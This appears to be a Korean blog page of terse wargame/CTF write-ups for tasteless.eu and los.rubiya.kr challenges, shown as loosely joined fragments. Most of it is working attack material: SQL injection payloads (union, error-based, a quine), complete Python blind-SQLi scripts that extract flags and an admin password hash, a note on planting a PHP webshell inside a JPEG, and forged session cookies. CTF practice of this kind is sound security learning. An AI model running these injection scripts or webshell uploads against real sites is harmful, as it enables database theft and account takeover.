'Wargame'에 해당되는 글 454건

간단한 업로드페이지가 있는데 제공해주는 소스를 보면 .htaccess에 jpeg가 실행 권한이 있다.

jpeg 파일 안에 php코드 박아서 올려주며 웹쉘 실행이 가능하다.

payload

,exp(~(select flag from level6_flag limit 0,1))

<?php 
highlight_file('index.php'); 
/* 
view file: php.ini 
so here is my hint: the included php.ini file is part of the configugartion file used on the server the bug was found. 
so there will be something in it which enables you to solve this level, wont? 

always be UP TO DATE! 

hint enough, might just take you seconds to do?! 
*/ 
error_reporting(0); 
include('anti_rfi.php'); //rfi is forbidden!!!!! 

$inc = @$_GET['file']; 
@require_once($inc); 
?> 

해당 문제는 의도한 풀이와 의도하지 않은 풀이로 문제를 풀었다.

문제에 들어가면 블라인드 SQLI가 아니라고 하며 대부분의 Blind SQL시 사용하는 구문들이 필터링 되어있다.

그러나 필터링되지 않은 구문을 사용해주면 Blind SQLI가 가능하며 Unintended 풀이가 가능하다.

의도된 풀이

payload

,1) union (select 1,flag from level1_flag)#

의도되지 않은 풀이

import requests

def request(payload):

    url = "http://chall.tasteless.eu/level1/index.php"

    params = {'dir':payload}

    headers = {'Cookie':'login=guest%25084e0343a0486ff05530df6c705c8bb4; __cfduid=dc8f9c4e92cf4316e617bbaa23cfc8b8f1532166053; PHPSESSID=dnn3sve7g1th9sh0164soi6ck6'}

    response = requests.get(url,params=params,headers=headers).text

    print response

    if "error" in response:

        return True

    else:

        return False

length = 0

for i in range(0,100):

    payload = ",(select 1 from level1_flag where length((select flag from level1_flag)) in ("+str(i)+") and 9e300*9e300))#"

    if request(payload) == True:

        length = i

        print "Find Flag Length[*] = " + str(length)

        break

strings = "0123456789abcdef"

flag = ""

for i in range(1,length+1):

    for j in range(0,len(strings)):

        payload = ",(select 1 from level1_flag where lpad((select flag from level1_flag),"+str(i)+",space(1)) in ('"+flag+strings[j]+"') and 9e300*9e300))#"

        if request(payload) == True:

            flag+=strings[j]

            print "Find Flag[-] = " + flag

print "Find Flag[+] = " + flag

로그인 후 id 파라미터에서 SQLI가 터지는데 union이 안된다. 블라인드로 어드민 계정의 패스워드를 구해주면 아래와 같은 32자리 md값이 나온다.

import requests

def request(payload):

    url = "http://chall.tasteless.eu/level4/index.php"

    params = {'action':'pm','id':payload}

    headers = {'Cookie':'login=guest%25084e0343a0486ff05530df6c705c8bb4; __cfduid=dc8f9c4e92cf4316e617bbaa23cfc8b8f1532166053; PHPSESSID=dnn3sve7g1th9sh0164soi6ck6'}

    response = requests.get(url,params=params,headers=headers).text

    if "Welcome" in response:

        return True

    else:

        return False

length = 0

for i in range(0,100):

    payload = "1 and length((select pass from level4 where username=0x61646d696e limit 0,1))="+str(i)+"#"

    if request(payload) == True:

        length = i

        print "Find Admin Pw Length[*] = " + str(length)

        break

binary = ""

admin_pw = ""

for i in range(1,length+1):

    binary = ""

    for j in range(1,9):

        payload = "1 and substring(lpad(bin(ascii(substring((select pass from level4 where username=0x61646d696e limit 0,1),"+str(i)+",1))),8,0),"+str(j)+",1)#"

        if request(payload) == True:

            binary += "1"

        else:

            binary += "0"

    if binary !="00000000":

        admin_pw += chr(int(binary,2))

        print "Find Admin Pw[-] = " + admin_pw

print "Find Admin Pw[+] = " + admin_pw

이걸 로그인 후 할당받는 쿠키 값 중 login=guest%25084e0343a0486ff05530df6c705c8bb4 요렇게 된 부분에 admin%2598aa0ec014a46e34571affaf88999ebb 요런식으로 넣어주면 플래그가 나온다.

Flag = D0nt_Yu0_LOv3_co0kies

payload

f' union select 1,2,(select flag from level2_flag)-- 

flag = 79219382ac0f0fcac80213d95ec2da24

import requests

def request(payload):
    url = "http://los.rubiya.kr/alien_91104597bf79b4d893425b65c166d484.php"
    params = {'no':payload}
    headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url,params=params,headers=headers)
    if "Clear" in response.text:
        return True
    else:
        return False


payload = "4444 union select concat(char(substring(now(),length(now()))%2+96+sleep(1)),0x646d696e)#' union select concat(char(substring(now(),length(now()))%2+97+sleep(1)),0x646d696e)#"
for i in range(1,20):
    if request(payload) == True:
        print str(i) + " Request Success!"
        break
    else:
        print str(i) + " Request Fail.."

payload

' union select substring(info,38,80) pw from information_schema.processlist -- x

payload

' UNION SELECT REPLACE(REPLACE('" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x',CHAR(34),CHAR(39)),CHAR(36),'" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x') AS id-- x